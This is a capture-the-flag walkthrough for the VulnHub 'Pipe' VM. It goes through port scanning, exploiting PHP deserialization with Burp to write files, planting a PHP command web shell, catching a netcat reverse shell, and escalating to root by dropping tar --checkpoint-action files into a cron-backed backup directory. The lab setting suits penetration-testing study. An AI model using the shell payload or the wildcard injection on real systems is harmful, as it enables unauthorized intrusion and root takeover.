Coffee Difficulty Rating:


Another short, but fun VM.

Author: @s4gi_

Download: /dev/random: Pipe via @VulnHub

\______   \__|_____   ____  
 |     ___/  \____ \_/ __ \
  |    |   |  |  |_> >  ___/
   |____|   |__|   __/ \___  >
                |__|        \/  ·VM· (MiNi CHaLLeNGe BuiLT FoR ZaCoN Vi)


22/tcp    open  ssh     syn-ack OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   1024 16:48:50:89:e7:c9:1f:90:ff:15:d8:3e:ce:ea:53:8f (DSA)
|   2048 ca:f9:85:be:d7:36:47:51:4f:e6:27:84:72:eb:e8:18 (RSA)
|_  256 d8:47:a0:87:84:b2:eb:f5:be:fc:1c:f1:c9:7f:e3:52 (ECDSA)
80/tcp    open  http    syn-ack Apache httpd
| http-auth:
| HTTP/1.1 401 Unauthorized
|_  Basic realm=index.php
|_http-server-header: Apache
|_http-title: 401 Unauthorized
111/tcp   open  rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          42192/udp  status
|_  100024  1          47286/tcp  status
47286/tcp open  status  syn-ack 1 (RPC #100024)
MAC Address: 00:0C:29:05:96:3D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Uptime guess: 199.640 days (since Sat May  9 04:40:31 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service Enumeration

Port Service Version Detection

TCP: 22


OpenSSH 6.7p1 Debian 5

TCP: 80


Apache HTTPD

TCP: 111



HTTP Enumeration

Running OWASP dirbuster against port 80 exposed /scriptz/ containing javascript and php files.

OWASP DirBuster

Source Code Interrogation

php.js Interrogation

js.php source revealed function serialize

note: the examples at the bottom.

function serialize(mixed_value) {
//  discuss at:
// original by: Arpad Ray (mailto:[email protected])
// improved by: Dino
// improved by: Le Torbi (
// improved by: Kevin van Zonneveld (
// bugfixed by: Andrej Pavlovic
// bugfixed by: Garagoth
// bugfixed by: Russell Walker (
// bugfixed by: Jamie Beck (
// bugfixed by: Kevin van Zonneveld
//  (
// bugfixed by: Ben (
//    input by: DtTvB  (
//    input by: Martin (
//        note: We feel the main purpose of this function should be to ease the transport of data between php & js
//        note: Aiming for PHP-compatibility, we have to translate objects to arrays
//   example 1: serialize(['Kevin', 'van', 'Zonneveld']);
//   returns 1:'a:3:{i:0;s:5:"Kevin";i:1;s:3:"van";i:2;s:9:"Zonneveld";}'
//   example 2: serialize({firstName:'Kevin', midName: 'van', surName:'Zonneveld'});
//   returns 2: 'a:3:{s:9:"firstName";s:5:"Kevin";s:7:"midName";s:3:"van";s:7:"surName";s:9:"Zonneveld";}'

log.php.BAK Interrogation

Inspection of the source revealed it works with the js file for serialization.

log.php.BAK Source Code Review

Burp Suite - POST Request

Modifying the request from GET to POST, renendered the index.php

Burp POST instead of GET

Burp confirmed the Serialized object:

Burp Serialized Object

Burp decode string

Burp Decode String

Right click the string, send to Decoder.

Burp Decoder Smart Decoder

Click “Smart decode”

Using the example section of the previously discovered php.js file, it was possible to workout the serialization mechanism.

New modified string introduced with burp:


Using Burp Decoder URL Encode the above string and using Burp Repeater to inject.

Burp Repeater

Refreshing the scriptz directory confirmed the creation of Meh.txt containing the text HighOnCoffee.

Injecting Reverse Shell Code

Burp Decoder was leveraged to encode the following string:

<?php echo '<pre>'; system($_GET['cmd']); echo '</pre>'; ?>";}

Select Encode as URL.

Paste encoded string into Burp Repeater:

Burp Repeater PHP Shell Upload

PHP Shell


Reverse Shell

nc is installed on the target, the php shell introduced at the previous step is leveraged to execute a netcat reverse shell.

Execute Netcat

[root:~]# nc -v -n -l -p 443
listening on [any] 443 ...
connect to [] from (UNKNOWN) [] 37957
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Linux Local Privilege Escalation

Spawn tty:

python -c 'import pty;pty.spawn("/bin/bash")'

Get HighOn.Coffee linux local enumeration script:


HighOn.Coffee script enum

Inspection of /etc/crontab exposed the script /usr/bin/ which is world readable.


Tar Unix Wildcards Local Privilege Escalation

Unix Wildcards

The previously discovered backup script uses * to perform a backup of all files within the directory /home/rene/backup/. Due to poorly configured file system permission on the backup directory, it’s possible to introduce files in the backup directory which tar will process when it backs up the files in the directory.

Tar Arbitrary Command Execution

Tar’s --checkpoint-action parameter can be abused to execute arbitrary code as the user executing the tar binary. --checkpoint-action exists as a tar feature allowing binary execution of a command when the file prefixed with --checkpoint-action=exec=COMMAND-HERE is reached.

www-data@pipe:/home/rene/backup$ echo > --checkpoint-action=exec=sh\;
<ckup$ echo > --checkpoint-action=exec=sh\;                        
www-data@pipe:/home/rene/backup$ echo > --checkpoint=1;
echo > --checkpoint=1;

The above leverages the tar arbitrary command execution, reseting the root account password when the cronjob is processed (every 5 minutes).

Root Flag

After 5 minutes, escalate root privileges by executing su - and entering the password passwd.

Pipe Root Flag VulnHub

Thanks for the VM :)